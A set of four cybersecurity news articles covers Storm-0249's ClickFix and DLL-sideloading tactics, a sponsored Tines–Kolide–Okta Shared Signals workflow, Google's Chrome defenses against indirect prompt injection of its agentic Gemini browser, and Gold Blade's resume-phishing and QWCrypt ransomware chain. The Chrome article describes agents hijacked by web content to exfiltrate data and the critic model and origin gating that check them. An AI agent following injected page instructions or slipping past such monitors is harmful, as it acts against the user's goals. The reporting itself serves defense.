The threat actor known as Storm-0249 is likely shifting from its role as an initial access broker to adopt a combination of more advanced tactics like domain spoofing, DLL side-loading, and fileless PowerShell execution to facilitate ransomware attacks. “These methods allow them to bypass defenses, infiltrate networks, maintain persistence, and operate undetected, raising serious concerns for security teams,” ReliaQuest said in a report shared with The Hacker News. Storm-0249 is the moniker assigned by Microsoft to an initial access broker that has sold footholds into organizations to other cybercrime groups, including ransomware and extortion actors like Storm-0501 . It was first highlighted by the tech giant in September 2024.

Then, earlier this year, Microsoft also revealed details of a phishing campaign mounted by the threat actor that used tax-related themes to target users in the U.S. ahead of the tax filing season and infect them with Latrodectus and the BruteRatel C4 (BRc4) post-exploitation framework. The end goal of these infections is to obtain persistent access to various enterprise networks and monetize them by selling them to ransomware gangs, providing them with a ready supply of targets, and accelerating the pace of such attacks. The latest findings from ReliaQuest demonstrate a tactical shift, where Storm-0249 has resorted to using the infamous ClickFix social engineering tactic to trick prospective targets into running malicious commands via the Windows Run dialog under the pretext of resolving a technical issue.

In this case, the command copied and executed leverages the legitimate “curl.exe” to fetch a PowerShell script from a URL that mimics a Microsoft domain to give victims a false sense of trust (“sgcipl[.]com/us.microsoft.com/bdo/”) and execute it in a fileless manner via PowerShell. This, in turn, results in the execution of a malicious MSI package with SYSTEM privileges, which drops a trojanized DLL associated with SentinelOne’s endpoint security solution (“SentinelAgentCore.dll”) into the user’s AppData folder along with the legitimate “SentinelAgentWorker.exe” executable. In doing so, the idea is to sideload the rogue DLL when the “SentinelAgentWorker.exe” process is launched, thereby allowing the activity to stay undetected. The DLL then establishes encrypted communication with a command-and-control (C2) server.

Storm-0249 has also been observed making use of legitimate Windows administrative utilities like reg.exe and findstr.exe to extract unique system identifiers like MachineGuid to lay the groundwork for follow-on ransomware attacks. The use of living-off-the-land (LotL) tactics, coupled with the fact that these commands are run under the trusted “SentinelAgentWorker.exe” process, means the activity is unlikely to raise any red flags. The findings indicate a departure from mass phishing campaigns to precision attacks that weaponize the trust associated with signed processes for added stealth. “This isn’t just generic reconnaissance – it’s preparation for ransomware affiliates,” ReliaQuest said.

“Ransomware groups like LockBit and ALPHV use MachineGuid to bind encryption keys to individual victim systems.” “By tying encryption keys to MachineGuid, attackers ensure that even if defenders capture the ransomware binary or attempt to reverse-engineer the encryption algorithm, they cannot decrypt files without the attacker-controlled key.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

How to Streamline Zero Trust Using the Shared Signals Framework

Zero Trust helps organizations shrink their attack surface and respond to threats faster, but many still struggle to implement it because their security tools don’t share signals reliably. 88% of organizations admit they’ve suffered significant challenges in trying to implement such approaches, according to Accenture . When products can’t communicate, real-time access decisions break down. The Shared Signals Framework (SSF) aims to fix this with a standardized way to exchange security events.

Yet adoption is uneven. For example, Kolide Device Trust doesn’t currently support SSF. Scott Bean, Senior IAM and Security Engineer at MongoDB, proposed a way to solve the problem, giving teams an easy and intuitive way to operationalize SSF across their environment. In this guide, we’ll share an overview of the workflow , plus step-by-step instructions for getting it up and running.

The problem – IAM tools don’t support SSF A core requirement of Zero Trust is continuous, reliable signals about user and device posture. But many tools don’t support SSF for Continuous Access Evaluation Protocol (CAEP), making it hard to share or act on these signals. Teams often face three challenges: Tools lack native SSF support Signals require enrichment or correlation Managing SSF endpoints and token handling adds overhead Without this interoperability, organizations struggle to apply consistent policies — and in cases like Kolide Device Trust, critical device events never reach systems like Okta. The solution – a SSF transmitter that turns Kolide issues into CAEP events Because SSF is built on HTTPS requests, the OpenID standard works with Tines’ HTTP Action.

Scott developed a new workflow integrating Kolide Device Trust with Tines , enabling it to send SSF signals to Okta. If a device is non-compliant, Kolide sends a message to the workflow via webhook. Tines enriches the signal, makes sure it can be linked to a user, builds a Security Event Token (SET), and then sends it to Okta. In this way, Tines acts as the connective tissue that makes SSF work across the distributed IT environment, even if individual tools don’t natively support the standard.

Tines can: Receive signals from Kolide (and tools like it) via webhook when a device becomes non-compliant Enrich and correlate those signals (e.g., map device to user) Generate and sign SETs that meet the SSF specification Deliver them to Okta (and other identity providers) to enforce Zero Trust Host required SSF metadata endpoints using API path prefixes, giving consuming systems a standards-compliant place to fetch keys and decrypt tokens All of which makes Zero Trust enforcement faster, more reliable, and much easier to operationalize. IT teams are empowered with continuous, real-time risk assessment of devices, faster response to threats, and more flexible policy orchestration. And end users get the benefit of automated remediation, which helps to optimize productivity and minimize IT intervention. If you want to go deeper into identity modernization, the Tines IAM guide explores how teams are unifying device trust, access decisions, and least-privilege enforcement with automation.

Scott’s workflow is one of several real-world patterns inside. Workflow overview Required tools: Tines – workflow orchestration and AI platform Kolide – device trust and posture monitoring Okta – identity platform receiving CAEP events Required credentials: Tines API Key - Team Scoped with the Editor role Kolide API Key - Read Only Kolide Webhook Signing Secret Required resources: Okta domain, such as example.okta.com, example.oktapreview.com, or a branded domain. How it works: The workflow creates a proof-of-concept SSF transmitter that can be registered with Okta and sends device compliance change CAEP events (sent as SETs), based on issues generated in Kolide. There are three elements: 1.

Generate and store SET signing keys (SETs are signed JSON Web Tokens): Creates an RSA key pair and converts it to JWK format. Publishes the public key for SSF receivers to validate SET signatures. Stores the private JWK keyset as a Tines secret. 2.

Expose SSF transmitter API SSF receivers (like Okta) need: a .well-known/sse-configuration endpoint describing the transmitter a JWK endpoint exposing the public key used to verify SET signatures a webhook trigger acts as the SSF API surface logic returns the .well-known config logic returns the JWKs Once this is live, teams can register a new SSF receiver in Okta under: Security → Device Integrations → Receive shared signals And create a new stream using the API’s URL and the new .well-known endpoint

Create, sign and send of SETs from Kolide events Receives Kolide issue events via webhook and validates them using the signing secret. Fetches device and user metadata from Kolide. Builds a SET for a Device Compliance Change CAEP event.

Signs the SET with the stored private key using the JWT_SIGN formula. Sends the signed token to Okta’s security-events endpoint. This delivers real-time device-compliance updates to Okta so access policies can respond immediately. Configuring the workflow — a step-by-step guide You can build and run this entire workflow using Tines Community Edition .

Log into Tines or create a new account. 2. Navigate to the pre-built workflow in the library.

Select import. This should take you straight to your new pre-built workflow. 3. Gather the required credentials Tines API Key (team-scoped with Editor role) Kolide API Key (read-only) Kolide Webhook Signing Secret These ensure authenticated calls to Kolide and secure webhook validation.

Collect your required resources You’ll need an Okta tenant domain, such as: example.oktapreview.com example.okta.com or your custom Okta brand domain This domain is used when sending signed SETs to Okta’s security-events endpoint. Note: In the example provided, Scott set up as a push rather than a poll provider as tokens are sent based off of inbound webhooks, so there’s no need to store state . 5.

Generate your SET signing keys Use the Generate JWK keyset action to create RSA keys Convert both public and private keys to JWK format (two event transforms) Store the resulting keyset using a Tines secret This is required before Okta will accept and verify your SETs. 6. Publish the SSF transmitter API The SSF API webhook contains two branches: .well-known endpoint Trigger: well-known Event transform: returns the SSF configuration declaring the transmitter’s capabilities JWKS endpoint Trigger: JWKs Event transform: returns the public JWKs so Okta can verify signatures Once live, Okta can register this transmitter as a shared signals sender. 7.

Connect Kolide and process device issues The Kolide integration flow follows these steps: Webhook: Kolide webhook – receives issue opened/resolved events Get device details – fetches metadata for the device involved Device has a user – branching logic to confirm a user is associated Get user details – look up user metadata for the CAEP payload Depending on whether the issue is new or resolved: Build SET – construct the CAEP device_compliance_change event Sign SET – use the RSA private key stored earlier to produce an SSF-compliant SET Send SET – send the final signed token to Okta’s security-events endpoint As soon as Okta receives and verifies the SET, the associated user risk level updates. Bringing it all together SSF exists to help security tools speak the same language, delivering continuous insight into risk and device posture. But when key tools don’t support the standard, gaps open up, and access policies lag behind real-world changes. Tines bridges these gaps by enabling new intelligent workflows.

They ensure that even tools that don’t support SSF can send information in the same standardized way. By using Tines to generate, sign, and deliver compliance signals in real time, you get the benefits of SSF even when the source tool wasn’t built for it. If you’d like to try this workflow yourself, you can spin it up in minutes with a free Tines account . And if you want to see how device posture fits into a broader identity strategy, this guide to modern IAM workflows offers practical patterns and real-world workflows like Scott’s you can start building on today.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Google Adds Layered Defenses to Chrome to Block Indirect Prompt Injection Threats

Google on Monday announced a set of new security features in Chrome, following the company’s addition of agentic artificial intelligence (AI) capabilities to the web browser. To that end, the tech giant said it has implemented layered defenses to make it harder for bad actors to exploit indirect prompt injections that arise as a result of exposure to untrusted web content and inflict harm. Chief among the features is a User Alignment Critic, which uses a second model to independently evaluate the agent’s actions in a manner that’s isolated from malicious prompts. This approach complements Google’s existing techniques, like spotlighting , which instruct the model to stick to user and system instructions rather than abiding by what’s embedded in a web page.

“The User Alignment Critic runs after the planning is complete to double-check each proposed action,” Google said . “Its primary focus is task alignment: determining whether the proposed action serves the user’s stated goal. If the action is misaligned, the Alignment Critic will veto it.” The component is designed to view only metadata about the proposed action and is prevented from accessing any untrustworthy web content, thereby ensuring that it is not poisoned through malicious prompts that may be included in a website. With the User Alignment Critic, the idea is to provide safeguards against any malicious attempts to exfiltrate data or hijack the intended goals to carry out the attacker’s bidding.

“When an action is rejected, the Critic provides feedback to the planning model to re-formulate its plan, and the planner can return control to the user if there are repeated failures,” Nathan Parker from the Chrome security team said. Google is also enforcing what’s called Agent Origin Sets to ensure that the agent only has access to data from origins that are relevant to the task at hand or data sources the user has opted to share with the agent. This aims to address site isolation bypasses where a compromised agent can interact with arbitrary sites and enable it to exfiltrate data from logged-in sites. This is implemented by means of a gating function that determines which origins are related to the task and categorizes them into two sets - Read-only origins, from which Google’s Gemini AI model is permitted to consume content Read-writable origins, to which the agent can type or click on in addition to reading from “This delineation enforces that only data from a limited set of origins is available to the agent, and this data can only be passed on to the writable origins,” Google explained.

“This bounds the threat vector of cross-origin data leaks.” Similar to the User Alignment Critic, the gating function is not exposed to untrusted web content. The planner is also required to obtain the gating function’s approval before adding new origins, although it can use context from the web pages a user has explicitly shared in a session. Another key pillar underpinning the new security architecture relates to transparency and user control, allowing the agent to create a work log for user observability and request their explicit approval before navigating to sensitive sites, such as banking and healthcare portals, permitting sign-ins via Google Password Manager, or completing web actions like purchases, payments, or sending messages. Lastly, the agent also checks each page for indirect prompt injections and operates alongside Safe Browsing and on-device scam detection to block potentially suspicious content.

“This prompt-injection classifier runs in parallel to the planning model’s inference, and will prevent actions from being taken based on content that the classifier determined has intentionally targeted the model to do something unaligned with the user’s goal,” Google said. To further incentivize research and poke holes in the system, the company said it will pay up to $20,000 for demonstrations that result in a breach of the security boundaries. These include indirect prompt injections that allow an attacker to - Carry out rogue actions without confirmation Exfiltrate sensitive data without an effective opportunity for user approval Bypass a mitigation that should have ideally prevented the attack from succeeding in the first place “By extending some core principles like origin-isolation and layered defenses, and introducing a trusted-model architecture, we’re building a secure foundation for Gemini’s agentic experiences in Chrome,” Google said. “We remain committed to continuous innovation and collaboration with the security community to ensure Chrome users can explore this new era of the web safely.” The announcement follows research from Gartner that called on enterprises to block the use of agentic AI browsers until the associated risks, such as indirect prompt injections, erroneous agent actions, and data loss, can be appropriately managed.

The research also warns of a possible scenario where employees “might be tempted to use AI browsers and automate certain tasks that are mandatory, repetitive, and less interesting.” This could cover cases where an individual dodges mandatory cybersecurity training by instructing the AI browser to complete it on their behalf. “Agentic browsers, or what many call AI browsers, have the potential to transform how users interact with websites and automate transactions while introducing critical cybersecurity risks,” the advisory firm said. “CISOs must block all AI browsers in the foreseeable future to minimize risk exposure.” The development comes as the U.S. National Cyber Security Centre (NCSC) said that large language models (LLMs) may suffer from a persistent class of vulnerability known as prompt injection and that the problem can never be resolved in its entirety.

“Current large language models (LLMs) simply do not enforce a security boundary between instructions and data inside a prompt,” said David C, NCSC technical director for Platforms Research. “Design protections need to therefore focus more on deterministic (non-LLM) safeguards that constrain the actions of the system, rather than just attempting to prevent malicious content reaching the LLM.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

STAC6565 Targets Canada in 80% of Attacks as Gold Blade Deploys QWCrypt Ransomware

Canadian organizations have emerged as the focus of a targeted cyber campaign orchestrated by a threat activity cluster known as STAC6565 . Cybersecurity company Sophos said it investigated almost 40 intrusions linked to the threat actor between February 2024 and August 2025. The campaign is assessed with high confidence to share overlaps with a hacking group known as Gold Blade , which is also tracked under the names Earth Kapre, RedCurl, and Red Wolf. The financially motivated threat actor is believed to be active since late 2018 , initially targeting entities in Russia, before expanding its focus to entities in Canada, Germany, Norway, Russia, Slovenia, Ukraine, the U.K., and the U.S.

The group has a history of using phishing emails to conduct commercial espionage. However, recent attack waves have found RedCurl to have engaged in ransomware attacks using a bespoke malware strain dubbed QWCrypt . One of the notable tools in the threat actor’s arsenal is RedLoader, which sends information about the infected host to a command-and-control (C2) server and executes PowerShell scripts to collect details related to the compromised Active Directory (AD) environment. “This campaign reflects an unusually narrow geographic focus for the group, with almost 80% of the attacks targeting Canadian organizations,” Sophos researcher Morgan Demboski said.

“Once focused primarily on cyber espionage, Gold Blade has evolved its activity into a hybrid operation that blends data theft with selective ransomware deployment via a custom locker named QWCrypt.” Other prominent targets include the U.S., Australia, and the U.K., with services, manufacturing, retail, technology, non-governmental organizations, and transportation sectors hit the hardest during the time period. The group is said to be operating under a “hack-for-hire” model, carrying out tailored intrusions on behalf of clients, while deploying ransomware on the side to monetize the intrusions. Although a 2020 report from Group-IB raised the possibility of it being a Russian-speaking group, there are currently no indications to confirm or deny this assessment. Describing RedCurl as a “professionalized operation,” Sophos said the threat actor stands apart from other cybercriminal groups owing to its ability to refine and evolve its tradecraft, as well as mount discreet extortion attacks.

That said, there is no evidence to suggest it’s state-sponsored or politically motivated. The cybersecurity company also pointed out that the operational tempo is marked by periods of no activity, followed by sudden spikes in attacks using improved tactics, indicating that the hacking group could be using the downtime to refresh its toolset. STAC6565 begins with spear-phishing emails targeting human resources (HR) personnel to trick them into opening malicious documents disguised as resumes or cover letters. Since at least November 2024, the activity has leveraged legitimate job search platforms like Indeed, JazzHR, and ADP WorkforceNow to upload the weaponized resumes as part of a job application process.

“As recruitment platforms enable HR staff to review all incoming resumes, hosting payloads on these platforms and delivering them via disposable email domains not only increases the likelihood that the documents will be opened but also evades detection by email-based protections,” Demboski explained. In one incident, a fake resume uploaded to Indeed has been found to redirect users to a booby-trapped URL that ultimately led to the deployment of QWCrypt ransomware by means of a RedLoader chain. At least three different RedLoader delivery sequences have been observed in September 2024, March/April 2025, and July 2025. Some aspects of the delivery chains were previously detailed by Huntress, eSentire, and Bitdefender.

The major change observed in July 2025 concerns the use of a ZIP archive that’s dropped by the bogus resume. Present within the archive is a Windows shortcut (LNK) that impersonates a PDF. The LNK file uses “rundll32.exe” to fetch a renamed version of “ADNotificationManager.exe” from a WebDAV server hosted behind a Cloudflare Workers domain. The attack then launches the legitimate Adobe executable to sideload the RedLoader DLL (named “srvcli.dll” or “netutils.dll”) from the same WebDAV path.

The DLL proceeds to connect to an external server to download and execute the second-stage payload, a standalone binary that’s responsible for connecting to a different server and retrieving the third-stage standalone executable alongside a malicious DAT file and a renamed 7-Zip file. Both stages rely on Microsoft’s Program Compatibility Assistant (“pcalua.exe”) for payload execution, an approach seen in previous campaigns as well. The only difference is that the format of the payloads transitioned in April 2025 to EXEs instead of DLLs. “The payload parses the malicious .dat file and checks internet connectivity.

It then connects to another attacker-controlled C2 server to create and run a .bat script that automates system discovery,” Sophos said. “The script unpacks Sysinternals AD Explorer and runs commands to gather details such as host information, disks, processes, and installed antivirus (AV) products.” The results of the execution are packaged into an encrypted, password-protected 7-Zip archive and transferred to a WebDAV server controlled by the attacker. RedCurl has also been observed using RPivot, an open-source reverse proxy, and Chisel SOCKS5 for C2 communications. Another tool used in the attacks is a customized version of the Terminator tool that leverages a signed Zemana AntiMalware driver to kill antivirus-related processes via what’s called a Bring Your Own Vulnerable Driver (BYOVD) attack.

In at least one case in April 2025, the threat actors renamed both the components before distributing them via SMB shares to all servers in the victim environment. Sophos also noted that a majority of these attacks were detected and mitigated before the installation of QWCrypt. However, three of the attacks – one in April and two in July 2025 – led to a successful deployment. “In the April incident, the threat actors manually browsed and collected sensitive files, then paused activity for over five days before deploying the locker,” it added.

“This delay may suggest the attackers turned to ransomware after trying to monetize the data or failing to secure a buyer.” The QWCrypt deployment scripts are tailored to the target environment, often containing a victim-specific ID in the file names. The script, once launched, checks whether the Terminator service is running before taking steps to disable recovery and execute the ransomware on endpoint devices across the network, including the organization’s hypervisors. In the last stage, the script runs a cleanup batch script to delete existing shadow copies and every PowerShell console history file to inhibit forensic recovery. “Gold Blade’s abuse of recruitment platforms, cycles of dormancy and bursts, and continual refinement of delivery methods demonstrate a level of operational maturity not typically associated with financially motivated actors,” Sophos said.

“The group maintains a comprehensive and well-organized attack toolkit, including modified versions of open-source tooling and custom binaries to facilitate a multi-stage malware delivery chain.” The disclosure comes as Huntress said it has noticed a huge spike in ransomware attacks on hypervisors, jumping from 3% in the first half of the year to 25% so far in the second half, primarily driven by the Akira group. “Ransomware operators deploy ransomware payloads directly through hypervisors, bypassing traditional endpoint protections entirely. In some instances, attackers leverage built-in tools such as OpenSSL to perform encryption of the virtual machine volumes, avoiding the need to upload custom ransomware binaries,” wrote researchers Anna Pham, Ben Bernstein, and Dray Agha. “This shift underscores a growing and uncomfortable trend: attackers are targeting the infrastructure that controls all hosts, and with access to the hypervisor, adversaries dramatically amplify the impact of their intrusion.” Given the heightened focus of threat actors on hypervisors, it’s advised to use local ESXi accounts, enforce multi-factor authentication (MFA), implement a strong password policy, segregate the hypervisor’s management network from production and general user networks, deploy a jump box to audit admin access, limit access to the control plane, and restrict ESXi management interface access to specific administrative devices.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.